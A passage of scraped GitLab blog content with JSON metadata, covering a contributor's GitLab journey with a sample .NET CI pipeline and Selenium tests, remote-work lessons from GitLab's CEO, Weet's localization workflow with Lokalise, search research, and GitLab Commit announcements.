hackathon](https://about.gitlab.com/community/hackathon/). Somehow, I managed to take joint first prize!\n\nMy first few contributions were achieved by modifying my production GitLab installation (not ideal). So it was time to get the [GitLab Development Kit (GDK)](https://gitlab.com/gitlab-org/gitlab-development-kit) up and running. This was certainly not without its challenges (many of which I suspect stem from me being in the minority of GitLab contributors running Windows).\n\nI have since contributed to the [GDK project](https://gitlab.com/gitlab-org/gitlab-development-kit) and joined the GDK office hour calls to help shape the way forward and resolve some of the problems and frustrations.\n\nAt this point, I was leearning a lot. Not just about the tools and languages but about the best practices and work ethos within the GitLab team. Better yet, I was able to start taking some of these learnings back to the office.\n\n## 0.5 Years Ago\nI attended GitLab Commit - London 2019. This really helped to confirm my suspicions; we are only scraping the surface of GitLab's capabilities.\n\nOn a few occasions, I wondered whether GitLab may not be a good fit for my company as I watched huge companies like Porsche and Goldman Sachs present. A [presentation](https://www.youtube.com/watch?v=t0Eh1sq9r5s) by Huss El-Sheikh from startup 9fin helped ease my concerns.\n\nAround this time, I moved from Windows to Ubuntu to make it easier to work with GDK.\n\nI continued to learn a lot from my contributions, feedback, and interactions with the GitLab team, again applying what I could back in the office. Much around the languages/technologies I hadn’t previously worked with (namely ruby, postgres and vue), but also other takeaways such as:\n* when carrying out code reviews ask questions rather than give instructions (“what do you think about x?” is more productive than “change this to y”)\n* GitLab CI is capable of automating a lot of what we currently do by hand (e.g. code review for best practices)\n* always try to add tests when making code changes\n\nI am a firm believer of documenting processes, decisions, and rationale. There’s nothing worse than someone saying “we do it this way” without being able to back that up with reasoning. With that in mind, we implemented Merge Request Templates to ensure our team was consistent in our approach to coding, testing, and releasing.\n\nBy now our development team had plenty of experience with GitLab and we were starting to move our support team over. To help our team leads monitor merge requests, we adopted 2 simple departmental labels (`Support`/`Development`) and used our webhook engine to ensure every MR is automatically labelled.\n\n## Today / What’s Next\nIn preparation for a transition to .NET core, deprecation of the Windows shell runner and a desire to start testing our frontend (web), I started putting a CI script together using docker and the mcr.microsoft.com/dotnet/core/sdk:latest image. The .gitlab-ci.yml looks like;\n\n```yml\nstages:  \n  - build\n  - test\n\nvariables:\n  CI_DEBUG_TRACE: \"false\"\n  ASSEMBLY_VERSION: \"1.0.1\"\n\nbuild:\n stage: build\n tags:\n  - docker\n script:\n  - 'dotnet build'\n\ntest:\n stage: test\n tags:\n  - docker\n script:\n  - 'nohup dotnet run --project Web &'\n  - 'apt-get update'\n  - 'apt-get install -y unzip'\n  - 'wget https://chromedriver.storage.googleapis.com/83.0.4103.14/chromedriver_linux64.zip'\n  - 'unzip chromedriver_linux64.zip -d ~/'\n  - 'rm chromedriver_linux64.zip'\n  - 'mv -f ~/chromedriver /usr/local/bin/chromedriver'\n  - 'chown root:root /usr/local/bin/chromedriver'\n  - 'chmod 0755 /usr/local/bin/chromedriver'\n  - 'wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | apt-key add -'\n  - 'sh -c ''echo \"deb https://dl.google.com/linux/chrome/deb/ stable main\" >> /etc/apt/sources.list.d/google.list'''\n  - 'apt-get update'\n  - 'apt-get install -y google-chrome-stable'\n  - 'dotnet test -l:trx Tests/Tests.csproj /p:CollectCoverage=true'\n coverage: '/Total\\s*\\|.*\\|\\s(\\d+\\.?\\d*)%\\s*\\|.*\\|/'\n```\n\nAnd the tests look something like;\n\n```c#\n    public class UiTests : IDisposable\n    {\n        private readonly Process _webServerProcess;\n        private readonly IWebDriver _driver;\n\n        [Fact]\n        public void ClickNavPrivacyPolicy()\n        {\n            _driver.Navigate()\n                .GoToUrl(\"http://localhost:5000/\");\n\n            var link = _driver.FindElement(By.LinkText(\"Privacy\"));\n            link.Click();\n\n            Assert.Equal(\"http://localhost:5000/Home/Privacy\", _driver.Url);\n        }\n\n        public UiTests()\n        {\n            ChromeOptions chromeOptions = new ChromeOptions();\n            chromeOptions.AddArguments(\"headless\", \"no-sandbox\");\n            _driver = new ChromeDriver(chromeOptions);\n\n            if (RuntimeInformation.IsOSPlatform(OSPlatform.Linux)) return;\n\n            _webServerProcess = new Process\n            {\n                StartInfo = {\n                    WorkingDirectory = Path.Combine(System.AppDomain.CurrentDomain.BaseDirectory, \"..\", \"..\", \"..\", \"..\", \"Web\"),\n                    FileName = $\"dotnet.exe\",\n                    Arguments = \" run\",\n                    UseShellExecute = true,\n                }\n            };\n            _webServerProcess.Start();\n        }\n\n        private void KillWebServer()\n        {\n            if (_webServerProcess != null && !_webServerProcess.HasExited)\n            {\n                _webServerProcess.Kill();\n            }\n        }\n\n        public void Dispose()\n        {\n            _driver.Dispose();\n            KillWebServer();\n        }\n    }\n```\n\nYou can see some conditional code in there which allows Selenium tests to work both locally on our development machines and remotely on our GitLab runner. If you have a better way of achieving this, please leave a comment. I would love to chat and learn!\n\nI also want to start introducing some linting like we see in the GitLab project to enforce rules around code formatting (spaces, carriage returns, indentation, etc.). I have started to look at JetBrains Resharper (R#) command-line but haven’t had enough time to implement it yet. Ideally. I would like to start with just a rule or two and then slowly introduce more, but it looks quite tricky to take this approach. Please let me know if you’ve been able to achieve this!\n\nI would also like to lose our helpdesk and start using GitLab issues, service desk, timelogs, etc. I am working on identifying the gaps and working with the product managers to understand whether it is realistic to fill those gaps within the GitLab product. Alternatively, I will be looking to build some additional “bolt-ons” using webhooks and the API.\n\nWhile investigating gaps, I stumbled upon the [GitLab-Triage project](https://gitlab.com/gitlab-org/gitlab-triage) and I expect we'll use this to automate various workflows. I managed to help close a few issues and even create a few additional features which would make it work for us by [contributing to the GitLab-Triage project](https://gitlab.com/gitlab-org/gitlab-triage/-/merge_requests?scope=all&utf8=%E2%9C%93&state=merged&author_username=leetickett).\n\nWe also added more labels (`needs code review` & `needs functional review`) for our merge request approval process now. We can see where we are and what needs to be done at a glance. We previously relied on an MR checklist that we are deprecating.\n\n![Merge request checklist](https://about.gitlab.com/images/blogimages/lee-tickett-my-gitlab-journey/mr_checklist.png)\n\n![Merge requests with labels](https://about.gitlab.com/images/blogimages/lee-tickett-my-gitlab-journey/merge_requests_with_labels.png)\n\n## Contributing to GitLab \n\nI am very proud to have joined the GitLab Core Team. Thanks to everyone who has held my hand and patiently assisted me with contributions. \n\nWith the release of Microsoft Windows Subsystem for Linux v2, I have gone back to running Windows on my laptop with GDK running in Ubuntu on WSL2. This is working brilliantly for me at the moment (the way Visual Studio Code handles things especially is really cool).\n\nI now have 95 [merged merge requests!](https://gitlab.com/dashboard/merge_requests?scope=all&utf8=%E2%9C%93&state=merged&author_username=leetickett) and have been helping several others get started contributing (getting GDK up and running etc). Once this crazy pandemic is over and we can start to socialise again, I would like to try and start some sort of local meetup/group.\n\nI would like to help make it easier to connect GitLab users. I have visions of a mechanism to search for others based:\n* the size of their user base \n* the languages they are using\n* the feature they are using\n\nAt present, we have several tools (Gitter, Issues, Forum etc) but there is a strong reliance on being engaged and stumbling on questions/support requests. I suspect many of us would be happy to have other users reach out directly.\n\nIf you need any more information around:\n* getting your development environment/tools setup on Windows 10\n* getting CI working with .NET and SQL Server projects\n* building customisations using GitLab webhooks and API\n\n...or would like to see a demo of anything discussed above, I would be happy to oblige!\n\nI would love to connect with others who are either looking to, or already using GitLab for:\n* .NET projects\n* customer helpdesk \n* customer billing (using timelogs)\n\nThanks for reading! Here's a picture of me and the family repping with our GitLab merch!\n\n![The tickett family repping GitLab](https://about.gitlab.com/images/blogimages/lee-tickett-my-gitlab-journey/landing_page.png)\n",[109,267,910,686,9,685,779],{"slug":3639,"featured":6,"template":689},"lee-tickett-my-gitlab-journey","content:en-us:blog:lee-tickett-my-gitlab-journey.yml","Lee Tickett My Gitlab Journey","en-us/blog/lee-tickett-my-gitlab-journey.yml","en-us/blog/lee-tickett-my-gitlab-journey",{"_path":3645,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3646,"content":3652,"config":3658,"_id":3660,"_type":14,"title":3661,"_source":16,"_file":3662,"_stem":3663,"_extension":19},"/en-us/blog/lessons-on-building-a-distributed-company",{"title":3647,"description":3648,"ogTitle":3647,"ogDescription":3648,"noIndex":6,"ogImage":3649,"ogUrl":3650,"ogSiteName":673,"ogType":674,"canonicalUrls":3650,"schema":3651},"9 Lessons on building a distributed company","GitLab CEO Sid Sijbrandij and Outklip Founder Sunil Kowlgi talk about remote hiring, management, customer support, and more.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749678641/Blog/Hero%20Images/lessons-building-distributed-company.jpg","https://about.gitlab.com/blog/lessons-on-building-a-distributed-company","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"9 Lessons on building a distributed company\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sunil Kowlgi\"}],\n        \"datePublished\": \"2019-04-18\",\n      }",{"title":3647,"description":3648,"authors":3653,"heroImage":3649,"date":3655,"body":3656,"category":2074,"tags":3657},[3654],"Sunil Kowlgi","2019-04-18","\n_GitLab CEO Sid Sijbrandij occasionally sits down for a \"[pick your brain](/handbook/eba/ceo-scheduling/#pick-your-brain-meetings)\"\nmeeting with people seeking advice on open source, remote work, or a discussion of other things related to GitLab._\n\nIt is far easier to run an all-remote company than one that’s a hybrid of remote and colocated,\nsays [Sid Sijbrandij](/company/team/#sytses). When a company adopts a colocated\nculture there’s less recording of things and fewer digital artifacts, so it’s going to be hard for\nthe rest of the company to figure out how decisions are made.\n\nI interviewed Sid for lessons on building a distributed company like GitLab. Sid answered\nquestions on topics ranging from hiring to customer support.\n\nMy top takeaways from the interview:\n\n### 1. Remote interviews are more convenient than in-person interviews\n\nDuring an in-person interview, you need to make sure all your interview materials are loaded\nbeforehand on your laptop or iPad. It’s also going to be hard navigating things on your computer\nwhile talking to a person in front of you. You might write down notes that you’ll need to\ndigitize later by scanning, which is redundant work. On the other hand, when interviewing\nsomeone remotely over a video conference, you have all the materials at hand.\nBecause you’re looking at a screen you can look up information online and quickly take notes without interruption.\n\n### 2. Spend more time on the candidate’s questions than on your questions\n\nDuring interviews, you can get a lot of information about the candidate from the questions\nthey come prepared with and their follow-on questions. When Sid interviews, he spends most of the interview on the candidate’s questions.\n\n### 3. It is really important to write things down\n\nPeople are very efficient at reading things. If you write something down you can refer to it,\nso you don’t have to say everything again. In order to have alignment in a distributed company,\nrepetition of goals and strategy is needed. Repetition is easier when you have one writeup and people are able to easily find it.\n\n### 4. Google Docs is superior to a whiteboard\n\nIt is quite common to have meetings where everyone is looking at the same thing.\nBut, because of time zone differences, it’s hard to involve everyone in a meeting.\nWhile whiteboards are commonly used in in-person meetings, they’re not missed that much by remote workers.\nGoogle Docs is superior to a whiteboard because you never run out of space, you can use\nnumbered lists and indentation, and people can view them afterwards.\n\n### 5. Cross-functional teams don’t work well\n\nGitLab doesn’t do cross-functional teams. Teams are composed of people that perform a similar role.\nA team manager is someone who has experience with that role. This way the manager is able\nto assess results, coach, and give career advice, which is very important.\n\n### 6. Focus on the output of employees, not the input\n\nGood remote workers are focused on results. Especially for managers, it’s important that they\ndon’t focus on the input of people – how long they worked or things like that – but rather focus on the output.\nFocus on the input is not healthy in any company, but especially with remote work you have to let it go.\nNo one’s looking over your shoulder to check whether you’re on Facebook or not, and it’s fine if you\nare as long as you deliver the work to a reasonable degree.\n\n### 7. To be a good manager, you have to quickly identify and remedy underperformance\n\nGitLab hires people who are capable of being [managers of one](https://handbook.gitlab.com/handbook/values/#managers-of-one). But in instances where someone\nis underperforming, managers have to identify it, have a conversation, and take remedial action.\nHere’s [GitLab’s process for dealing with underperformance](/handbook/leadership/underperformance/).\n\n### 8. Be quick with recognition\n\nGitLab has various kinds of employee recognition. For quick recognition, there’s a #thanks\nchannel on Slack where people can celebrate their colleagues’ work. There are also $1,000\ndiscretionary bonuses and GitLab tends to be very high velocity with those.\nRecognizing employees and doing it quickly is really important.\n\n### 9. Put customer-reported issues on a level playing field with internally reported issues\n\nThe issue tracking process in GitLab doesn’t distinguish whether the issue reporter is a user,\n a customer, or a team member. If an issue comes from a user or customer, it’s probably\nbecause they care a lot about what you’re building. So, every feature request, everything\nGitLab team-members work on is out there on a level playing field. GitLab tends to have a lot more\ninteraction with customers than other companies.\n\nWatch the full interview below:\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/pDU8lxh1-6U\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\n[Visit this page to read the transcript of the interview](https://outklip.com/blog/gitlab-building-a-distributed-company/).\n\n### About the guest author\n\nSunil Kowlgi is the founder of [Outklip](https://outklip.com), a video platform for remote work.\n\nPhoto by [Brett Zeck](https://unsplash.com/photos/eyfMgGvo9PA?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText) on [Unsplash](https://unsplash.com/search/photos/globe?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText)\n{: .note}\n",[803,9,2660,888],{"slug":3659,"featured":6,"template":689},"lessons-on-building-a-distributed-company","content:en-us:blog:lessons-on-building-a-distributed-company.yml","Lessons On Building A Distributed Company","en-us/blog/lessons-on-building-a-distributed-company.yml","en-us/blog/lessons-on-building-a-distributed-company",{"_path":3665,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3666,"content":3672,"config":3678,"_id":3680,"_type":14,"title":3681,"_source":16,"_file":3682,"_stem":3683,"_extension":19},"/en-us/blog/lessons-weet-learned-lokalise",{"title":3667,"description":3668,"ogTitle":3667,"ogDescription":3668,"noIndex":6,"ogImage":3669,"ogUrl":3670,"ogSiteName":673,"ogType":674,"canonicalUrls":3670,"schema":3671},"How Weet integrates localization into the GitLab pipeline with Lokalise","Localization is an increasingly important option for users. Here's how to integrate localization in your GitLab pipeline.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749668543/Blog/Hero%20Images/lokalise_cover.png","https://about.gitlab.com/blog/lessons-weet-learned-lokalise","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How Weet integrates localization into the GitLab pipeline with Lokalise\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Alexander Pereverzevs\"}],\n        \"datePublished\": \"2021-09-13\",\n      }",{"title":3667,"description":3668,"authors":3673,"heroImage":3669,"date":3675,"body":3676,"category":1119,"tags":3677},[3674],"Alexander Pereverzevs","2021-09-13","\n\nAs a GitLab customer, Weet has fully invested in the premise of \"Iterate faster, innovate together.\" Weet has a low tolerance for processes that don't keep pace with the way they develop and launch. One important process that was slowing the business down – localizing their app.\n\nLocalization is a key way to drive growth and accelerate product adoption. When done poorly, localization or l10n, as it's commonly known, can slow down your development process, introduce bugs, and make it cumbersome to launch updates. When done right, teams can smooth out the process and [continuously localize](https://lokalise.com/features/localization-process-automation) their app. We unpack how Weet conquered its localization problems using GitLab and Lokalise.\n\n## What is Weet?\n\n[Weet](https://beeweet.com) is an asynchronous video communication tool designed to reduce the need for meetings. By combining video, audio, and screen sharing, it provides the nuance that written communication simply does not. For example, Weet's 10-person team, which is spread between France and the US, uses the product to speed through code reviews. The product has also been used for demos, design feedback, bug reports, QA reviews, and client presentations. At Lokalise, we use the tool to communicate with team members across time zones with ease and clarity.\n\nWeet started using GitLab five years ago and is using the latest version (13.11 as of this writing). For the runner they use 13.11 too, with an auto-scalable configuration (best feature ever!). The instance is self-managed on Google Cloud.\n\nWeet uses roughly 50 pipelines to manage processes such as: building the entire stack of the Weet application, checking the unit tests, deploying to a QA environment, deploying in production, launching the end-to-end tests, and more. The company currently has 17 projects set up, which are combined with GitLab CI/CD to deploy the Weet application.\n\nThey are, in summary... GitLab fans.\n\n## The first l10n solution\n\nWhen Weet first started localizing their app the engineering team considered two options:\n\n1. Download CSV files of strings, email them to the translators, and then reintegrate the data after the translation work was complete\n2. Translate directly in the IDE\n\nBoth options had their drawbacks. Downloading and uploading files takes developers out of the flow, but worse than that, the process can introduce l10n bugs that make the app look unreliable or amateurish. Also, these problems take time to resolve. It's not uncommon for version control to be an issue with this type of system.\n\nWeet chose the Web IDE option because it was easier to get started, but the process wasn't working at the pace they wanted.\n\n>> \"Before we used the Lokalise integration, we had to validate the new wording before each code push. The process was time-consuming as approvers were spread across different time zones,\" - Geraud Bonou-Selegbe, Full-stack engineer at Weet.\n\nHunting through the code to change all the instances of a word that needs to be replaced is not high on anyone's list of fun things to do.\n\nIt wasn't long before Jeremy Rouet, the CTO and co-founder of Weet, started looking for new options. If they wanted to fulfill the CI/CD promise of GitLab, they needed a tool that would integrate cleanly into the pipeline. Jeremy began testing translation management systems (TMS) and settled on integrating [Lokalise with GitLab](https://docs.lokalise.com/en/articles/1789855-gitlab).\n\n## How to continuously localize your product\n\nLokalise integrates into GitLab and allows a user (like Weet) to pull files into Lokalise, where translation tasks can be assigned and completed and then easily merged back.\n\n![Schema of how Lokalise works in GitLab](https://about.gitlab.com/images/blogimages/lokalize1.png){: .shadow.medium.center}\nA schema of how Lokalise works in GitLab.\n{: .note.text-center}\n\nDevelopers code as normal aiming to complete their work prior to each weekly release. Each push on master sends text strings automatically into Lokalise. Lokalise detects any changes to the text, so the developers don't have to remember what exactly they changed. Jeremy then uses the task features in Lokalise to assign the translation tasks to the Weet marketing team, who then go in and check all the new words.\n\nOnce the translation team is done, they create a merge request, and the product is ready to launch.\n\n>> \"Lokalise enabled us to bridge this gap by letting developers do what they do the best: coding. If my phrasing is not perfect, language experts can review it on Lokalise and then send a merge request with their updates. Now we've got the right expert in the right place for each milestone of our development process,\" says Geraud.\n\n![Lokalise Merge Request in GitLab](https://about.gitlab.com/images/blogimages/lokalize2.png){: .shadow.medium.center}\nWhat a merge request looks like using Lokalise and GitLab.\n{: .note.text-center}\n\nGone are the days of manually updating translations in the IDE in order to fix phrasing. Now app localization is a seamless and reliable part of the development workflow of the CI/CD process that is built around GitLab.\n\n## Steps to set up the integration\n\nFull instructions are available here. With over 500 keys in the app, the Weet team created several internal processes to keep their work tidy.\nOne move they made was to split their localization data into 5 projects/files. Each localization is a .json file. The separate files are:\n\n- emails\n- frontend\n- integration\n- server-side rendering\n- mobile – iOS/Android (WIP)\n\nThen to simplify key maintenance they used a naming pattern so that each component has its own keys. When they delete a component, they simply remove the main key from the localization file, which removes each label for this component. See below:\n\n![Deleting a component and removing main key from the localization file](https://about.gitlab.com/images/blogimages/lokalize3.png){: .shadow.medium.center}\nHow to delete a component and remove the main key from the localization file.\n{: .note.text-center}\n\nFinally, they tackled conflicts. The developers are able to edit the localization files both in Lokalise and in their environment. Changes in multiple systems could clash. To solve this problem, they decided that developers can only use Lokalise to update labels and they can only add or remove keys in their local environment.\n\n## What localization delivers\n\nIt took the Weet team some time and trial and error to smooth out the process.\n\nNow that the process is totally seamless, they can localize a new release in less than an hour with just a short quality check. That’s a big improvement from the days when they had to synchronize the dev, PO, and QA teams over a few days, to check and correct the new localization.\n\nWith their ability to continuously localize their app, they can focus on developing and delivering the best product possible. And it seems to be working as they were recently voted the #2 (closed) product of the week on Product Hunt. Coming up on the roadmap – mobile apps and more languages.\n",[779,231,9],{"slug":3679,"featured":6,"template":689},"lessons-weet-learned-lokalise","content:en-us:blog:lessons-weet-learned-lokalise.yml","Lessons Weet Learned Lokalise","en-us/blog/lessons-weet-learned-lokalise.yml","en-us/blog/lessons-weet-learned-lokalise",{"_path":3685,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3686,"content":3692,"config":3698,"_id":3700,"_type":14,"title":3701,"_source":16,"_file":3702,"_stem":3703,"_extension":19},"/en-us/blog/lets-all-search",{"title":3687,"description":3688,"ogTitle":3687,"ogDescription":3688,"noIndex":6,"ogImage":3689,"ogUrl":3690,"ogSiteName":673,"ogType":674,"canonicalUrls":3690,"schema":3691},"Let's all search!","We spoke with you about our search tools. Now we've got some issues we'd like your help on.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679339/Blog/Hero%20Images/AdvancedSearch.png","https://about.gitlab.com/blog/lets-all-search","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Let's all search!\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Will Leidheiser\"}],\n        \"datePublished\": \"2022-12-01\",\n      }",{"title":3687,"description":3688,"authors":3693,"heroImage":3689,"date":3695,"body":3696,"category":10,"tags":3697},[3694],"Will Leidheiser","2022-12-01","\n\nEarlier this year, our research team set out to learn how users search for GitLab content and to better understand their experience with our [global search](https://docs.gitlab.com/ee/user/search/) and [advanced search](https://docs.gitlab.com/ee/user/search/advanced_search.html) tools. We spoke with 12 GitLab users individually over the course of a four-week span to get their [feedback on our search capabilities](https://gitlab.com/groups/gitlab-org/-/epics/8193). \n\n![Getting feedback from GitLab users](https://about.gitlab.com/images/blogimages/2022-11-21-lets-all-search/Talking_to_GitLab_users.png){: .shadow.medium.center}\nA researcher talking with GitLab users to gather their feedback.\n{: .note.text-center}\n\n## Research insights\n\nOur research identified that the discoverability of our search could be better. Some users had never tried out our search capabilities because they did not know we had a search bar inside of GitLab. The search bar [did not visually stand out](https://gitlab.com/groups/gitlab-org/-/epics/8275) to some GitLab users, so this led them to try other means (e.g., using their web browser URL history or using another external application) to find content. In addition, we learned that even long-time users of the GitLab search bar were [unaware of the kinds of content it could find](https://gitlab.com/groups/gitlab-org/-/epics/8274). As we encouraged users to try out the search tools for our study, they would uncover new information either through exposure or by reading our documentation.\n\nOur research helped the Global Search Product team at GitLab with future roadmap planning. Now, we need the support of our community to make iterative improvements to GitLab search tools. We have identified **two** actionable insight issues that you can contribute to directly to improve the search experience for all GitLab users. \n\n## Community contribution issues\n\n- In order to make the search bar stand out, we're proposing a change to [improve the contrast of the search bar](https://gitlab.com/gitlab-org/gitlab/-/issues/330925) in the GitLab navigation header. This change would greatly support the accessibility of our site and would assist users when looking for a way to search for content.\n\n![Update to improve the contrast of our search bar](https://about.gitlab.com/images/blogimages/2022-11-21-lets-all-search/Focus.png){: .shadow.medium.center}\nA visual mock-up of improved contrast for the GitLab search bar.\n{: .note.text-center} \n\n- Improve the search experience by [providing hints](https://gitlab.com/gitlab-org/gitlab/-/issues/364402) about the kinds of content that the GitLab search bar can find. This change would prompt users with different ideas of what they can do with the search bar, so they can learn about our functionality without having to read through documentation.\n\n![Hints in the search bar](https://about.gitlab.com/images/blogimages/2022-11-21-lets-all-search/Placeholder_Options.png){: .shadow.medium.center}\nSome examples of hints that would be shown in the GitLab search bar.\n{: .note.text-center}\n\n## Let's contribute\n\nWondering where to start? Check out [this blog post](/blog/first-time-open-source-contributor-5-things-to-get-you-started) and [our development guide](/community/contribute/development/) and become an all-star contributor!\n\nNeed guidance or help? Feel free to leave a comment directly on one of the issues linked above, or find support in the \"get help\" section [in our contributing guide](/community/contribute/#getting-help).\n\n**Let's all contribute to GitLab's search!**\n",[708,267,9,729,730],{"slug":3699,"featured":6,"template":689},"lets-all-search","content:en-us:blog:lets-all-search.yml","Lets All Search","en-us/blog/lets-all-search.yml","en-us/blog/lets-all-search",{"_path":3705,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3706,"content":3712,"config":3717,"_id":3719,"_type":14,"title":3720,"_source":16,"_file":3721,"_stem":3722,"_extension":19},"/en-us/blog/live-from-commit-news",{"title":3707,"description":3708,"ogTitle":3707,"ogDescription":3708,"noIndex":6,"ogImage":3709,"ogUrl":3710,"ogSiteName":673,"ogType":674,"canonicalUrls":3710,"schema":3711},"At GitLab Commit, our product roadmap, new partners, and a new milestone","Live from GitLab Commit: what’s next for our product strategy, expanded partnerships, and more.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749664134/Blog/Hero%20Images/gitlabcommitbrooklyn.png","https://about.gitlab.com/blog/live-from-commit-news","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"At GitLab Commit, our product roadmap, new partners, and a new milestone\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Valerie Silverthorne\"}],\n        \"datePublished\": \"2019-09-17\",\n      }",{"title":3707,"description":3708,"authors":3713,"heroImage":3709,"date":3714,"body":3715,"category":299,"tags":3716},[1273],"2019-09-17","\nOur first ever user conference – GitLab Commit in Brooklyn – has only been under way for a few hours and we’ve already made a number of key announcements. Not only did we secure an additional [$268 million in Series E funding](/blog/gitlab-series-e-funding/) to power our DevOps journey forward, we’ve also strengthened key partnerships, hit new milestones, and released details about important new features in the product.\n\n## GitLab is for everyone\n\nIn the next few releases, look for GitLab to add advanced integration with the [Amazon Elastic Kubernetes](https://aws.amazon.com/eks/) service (EKS), something our CEO [Sid Sijbrandij](/company/team/#sytses) told the audience during his keynote at Commit. Sid also said the number of customers using GitLab with [Terraform by HashiCorp](/blog/gitlab-hashicorp-terraform-vault-pt-1/) is increasing at an exciting rate. This Ops-focused solution leverages GitLab’s CI/CD automated pipelines to better achieve infrastructure as code, a.k.a. GitOps. Lastly, later this year, look out for GitLab to integrate with HashiCorp’s very popular [Vault Project](https://www.vaultproject.io/docs/internals/security.html) that will protect secrets throughout the pipeline.\n\nMoving forward, Sid stressed that we believe everyone has a seat at the table. \"We will make our vision of a complete DevSecOps a reality for each and every one of you,\" says Sid.\n\nAnd for those who’ve been hoping for auto remediation, it’s coming, says [Mark Pundsack](/company/team/#markpundsack), vice president of product strategy, during his keynote. There is work to be done but the vision is clear: Necessary but repetitive security work will be automated in the near future.\n\nThat’s not the end, however. Mark outlined a future where operations and security teams have their own customized dashboards on GitLab, giving them access to the same information as developers. “A ton of people are involved with the development and delivery of software,” says Mark. “That is the ultimate GitLab vision: Where every knowledge worker involved with software development and delivery uses a single application so they are on the same page with the rest of their team members.” Ultimately GitLab will expand to the business side, bringing project managers, designers, legal, and executives into the mix. Mark’s final message: “GitLab is for everyone.”\n\n## GitLab & VMWare\n\n[GitLab and VMWare](https://www.globenewswire.com/news-release/2019/09/17/1916738/0/en/GitLab-to-Enable-Cloud-Native-Transformation-on-VMware-Cloud-Marketplace.html) announced a collaboration making [GitLab now available on the VMWare Cloud marketplace](https://about.gitlab.com/2019-09-17-gitlab-on-vmware-cloud-marketplace/). Development teams will be able to deploy and run [GitLab Enterprise (Core)](/pricing/) on their VMWare environments with just a few clicks. GitLab is packaged and supported by Bitnami which provides curated applications for the VMWare marketplace. GitLab also supports [“Continuous Verification”](https://thenewstack.io/how-continuous-security-can-solve-the-cloud-protection-conundrum/) by integrating with VMWare Secure State, Wavefront by VMWare, and CloudHealth.\n\n## KDE chooses GitLab\n\nKDE, an international technology community creating free and open source software for desktop and portable computing, [chose GitLab](https://www.globenewswire.com/news-release/2019/09/17/1916731/0/en/GitLab-Adopted-by-KDE-to-Foster-Open-Source-Contributions.html) for its developers. The KDE team wants to offer additional infrastructure support and thinks GitLab will help boost development momentum.\n\nThe KDE community is one of the largest free software communities with more than 2,600 contributors. Now they’ll have access to an even wider range of development and code review features with GitLab’s DevOps platform to complement their tools currently in use. The KDE community will have additional options for accessible infrastructure for contributors, code review integration with Git, streamlined infrastructure and tooling, and an open communication channel with the upstream GitLab community.\n\n## Forbes 2019 Cloud 100\n\nWe’re pretty excited to mention we’ve been named to the [Forbes 2019 Cloud 100](https://www.forbes.com/sites/mnunez/2019/09/11/a-truck-tracker-a-coder-toolbox-and-a-unicorn-from-down-under-inside-this-years-cloud-100/#6148bcad5653), the definitive ranking of the top 100 private cloud companies in the world, published by Forbes in partnership with Bessemer Venture Partners and Salesforce Ventures. We’re the only cloud-agnostic DevOps platform, and [we came in at number 32](https://about.gitlab.com/2019-09-11-gitlab-named-leader-in-forbes-cloud-100-list/)!\n\nIf you like what you’re hearing out of GitLab Commit Brooklyn, then join us at our next [GitLab Commit in London](/events/commit/#) on October 9.\n",[267,277,9,1721,1376],{"slug":3718,"featured":6,"template":689},"live-from-commit-news","content:en-us:blog:live-from-commit-news.yml","Live From Commit News","en-us/blog/live-from-commit-news.yml","en-us/blog/live-from-commit-news",{"_path":3724,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3725,"content":3731,"config":3737,"_id":3739,"_type":14,"title":3740,"_source":16,"_file":3741,"_stem":3742,"_extension":19},"/en-us/blog/major-league-gitlab-hacking",{"title":3726,"description":3727,"ogTitle":3726,"ogDescription":3727,"noIndex":6,"ogImage":3728,"ogUrl":3729,"ogSiteName":673,"ogType":674,"canonicalUrls":3729,"schema":3730},"Major League Hacking: Students contribute to feature updates","Our latest program participants explain their projects, their results, and the lessons they learned.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749663736/Blog/Hero%20Images/a-deep-dive-into-the-security-analyst-persona.jpg","https://about.gitlab.com/blog/major-league-gitlab-hacking","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Major League Hacking: Student fellows contribute to platform feature updates\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Bryan Behrenshausen\"}],\n        \"datePublished\": \"2023-05-30\",\n      }",{"title":3732,"description":3727,"authors":3733,"heroImage":3728,"date":3734,"body":3735,"category":10,"tags":3736},"Major League Hacking: Student fellows contribute to platform feature updates",[2909],"2023-05-30","\n\nContributing to [open source](https://go.gitlab.com/spHNym) projects [like GitLab](https://gitlab.com/gitlab-org) can be a powerful way to learn software development. Just ask [Mughees Pervaiz](https://gitlab.com/Mughees_), who is studying computer science at the University of South Asia, and [Young Jun Joo](https://gitlab.com/youngjun827), who is studying mathematics and economics at the University of Waterloo in Canada. They recently contributed to GitLab as part of a fellowship with [Major League Hacking](https://mlh.io/about), a Certified B corporation working to empower tomorrow's technology leaders. The fellows' [12-week program recently concluded](https://fellowship.mlh.io/), but before it was over, we gave them one final assignment: Explain your favorite contribution to GitLab during your fellowship.\n\nHere's what they had to say.\n\n## Mughees Pervaiz\nDuring my internship, I was a part of the GitLab Foundation team under the mentorship of our maintainer, [James 